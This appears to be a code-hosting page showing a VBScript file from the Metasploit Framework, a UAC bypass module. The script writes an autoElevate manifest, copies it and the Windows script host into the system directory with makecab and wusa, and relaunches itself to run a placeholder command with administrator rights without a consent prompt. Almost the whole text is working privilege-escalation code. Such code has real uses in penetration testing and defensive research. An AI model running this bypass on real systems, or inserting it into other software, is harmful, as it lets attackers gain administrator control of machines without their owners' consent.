Sign upLogin

rapid7/metasploit-framework

View on GitHub
Star
data/exploits/scripthost_uac_bypass/bypass.vbs

Summary

Maintainability
Test Coverage
Option Explicit

Dim oWs: Set oWs = CreateObject("WScript.Shell")
Dim oFso: Set oFso = CreateObject("Scripting.FileSystemObject")
Dim HOST_MANIFEST: HOST_MANIFEST = _
    "<?xml version=""1.0"" encoding=""UTF-8"" standalone=""yes""?>" & vbCrLf & _
    "<assembly xmlns=""urn:schemas-microsoft-com:asm.v1""" & vbCrLf & _
    "          xmlns:asmv3=""urn:schemas-microsoft-com:asm.v3""" & vbCrLf & _
    "          manifestVersion=""1.0"">" & vbCrLf & _
    "  <asmv3:trustInfo>" & vbCrLf & _
    "    <security>" & vbCrLf & _
    "      <requestedPrivileges>" & vbCrLf & _
    "        <requestedExecutionLevel level=""RequireAdministrator"" uiAccess=""false""/>" & vbCrLf & _
    "      </requestedPrivileges>" & vbCrLf & _
    "    </security>" & vbCrLf & _
    "  </asmv3:trustInfo>" & vbCrLf & _
    "  <asmv3:application>" & vbCrLf & _
    "    <asmv3:windowsSettings xmlns=""http://schemas.microsoft.com/SMI/2005/WindowsSettings"">" & vbCrLf & _
    "      <autoElevate>true</autoElevate>" & vbCrLf & _
    "      <dpiAware>true</dpiAware>" & vbCrLf & _
    "    </asmv3:windowsSettings>" & vbCrLf & _
    "  </asmv3:application>" & vbCrLf & _
    "</assembly>"


Sub Copy(ByVal sSource, ByVal sTarget)
    Dim sTempFile: sTempFile = GetTempFilename()
    oWs.Run "makecab """ & sSource & """ """ & sTempFile & """", 0, True
    oWs.Run "wusa """ & sTempFile & """ /extract:" & sTarget, 0, True
    oFso.DeleteFile sTempFile
End Sub

Sub Elevate()
    Const WINDIR = "%windir%"
    Dim sPath: sPath = Left(WScript.ScriptFullName, _
                            InStrRev(WScript.ScriptFullName, "\"))
    Dim sHost: sHost = Right(WScript.FullName, 11)
    Dim sManifest: sManifest = sPath & sHost & ".manifest"
    Dim oStream: Set oStream = oFso.CreateTextFile(sManifest)
    oStream.Write HOST_MANIFEST
    oStream.Close
    Copy sManifest, WINDIR
    Copy WScript.FullName, WINDIR
    oWs.Run WINDIR & "\" & sHost & " """ & WScript.ScriptFullName & """ /RESTART"
    oFso.DeleteFile sManifest
End Sub

Function GetTempFilename()
    Const vbTemporaryFolder = 2
    Dim sTempFolder: sTempFolder = oFso.GetSpecialFolder(vbTemporaryFolder)
    GetTempFilename = oFso.BuildPath(sTempFolder, oFso.GetTempName())
End Function

Sub RunAsAdmin()
  oWs.Run "COMMAND"
End Sub

If WScript.Arguments.Named.Exists("RESTART") Then
    RunAsAdmin
Else
    Elevate
End If